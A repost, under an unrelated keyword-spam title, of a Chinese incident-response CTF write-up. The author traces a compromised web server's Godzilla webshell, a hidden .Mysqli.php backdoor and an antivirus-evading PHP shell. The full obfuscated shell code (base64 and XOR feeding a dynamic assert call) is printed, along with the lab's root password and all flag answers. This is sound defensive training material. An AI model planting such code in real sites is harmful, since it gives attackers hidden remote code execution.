您的位置:首页 > 游戏 > 手游 > 房地产网_怎么做网页快捷方式_网站建设明细报价表_互联网营销师是哪个部门发证

房地产网_怎么做网页快捷方式_网站建设明细报价表_互联网营销师是哪个部门发证

2024/12/29 2:21:41 来源:https://blog.csdn.net/CLAY0011/article/details/144681937  浏览:    关键词:房地产网_怎么做网页快捷方式_网站建设明细报价表_互联网营销师是哪个部门发证
房地产网_怎么做网页快捷方式_网站建设明细报价表_互联网营销师是哪个部门发证
靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

tar -cvf web.tar /var/www/html

 

5cdb8e0a8f1b6d999ef697904b0a5579.png

将web服务端打包下载下来

D盾扫描

 

8dd248418694759edb4edac30095021d.png

 

6f0044d2739e867c8d2d5e593052aa7d.png

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2.黑客使用的什么工具的shell github地址的md5 flag{md5}

 

1067aee310e223f71fe40dd05458c945.png

哥斯拉特征

https://github.com/BeichenDream/Godzilla

 

d6320ecf7fef916122074f729440d5e3.png

flag{39392DE3218C333F794BEFEF07AC9257}

3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

 

96916e0d486c0a0c69b79618a5b9656e.png

可以看出隐藏后门是.Mysqli.php

/var/www/html/include/Db/.Mysqli.php

 

471567bde89ef298bb090068ead4c4b1.png

flag{AEBAC0E58CD6C5FAD1695EE4D1AC1919}

4.黑客免杀马完整路径 md5 flag{md5}

什么是免杀马?

免杀马(免杀病毒或免杀Webshell)是指经过特殊处理和混淆,使其能够避开杀毒软件和安全检测工具识别的恶意软件或后门程序。黑客使用各种技术手段,使恶意代码看起来像是正常代码,从而躲避签名检测和基于规则的安全机制。这种技术通常用于Webshell和其他后门程序,目的是保持对受害系统的隐蔽访问。

 

dbc355f1cea57192f81b2854479a9d6b.png

通过日志分析可知

top.php?1=phpinfo();

攻击者通过top.php这个文件查看了php版本信息

 

8dd248418694759edb4edac30095021d.png

D盾也可以

<?php$key = "password";//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

这段代码

为什么可以确认是恶意文件?

  • 混淆和隐藏
    • 使用Base64编码和字符异或操作来混淆代码。这些技术通常用于隐藏恶意代码,避免被直接检测到。
  • 动态执行
    • 动态生成并调用函数。这种模式允许攻击者通过URL参数传递任意代码并在服务器上执行,具有极大的危险性。
  • 外部输入
    • 使用$_GET参数来控制代码行为。通过外部输入来决定代码逻辑,使得攻击者可以远程控制服务器,执行任意PHP代码。

/var/www/html/wap/top.php

 

a331e20b61a50a9b30d5aed98a9b05ff.png

flag{EEFF2EABFD9B7A6D26FC1A53D3F7D1DE}

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com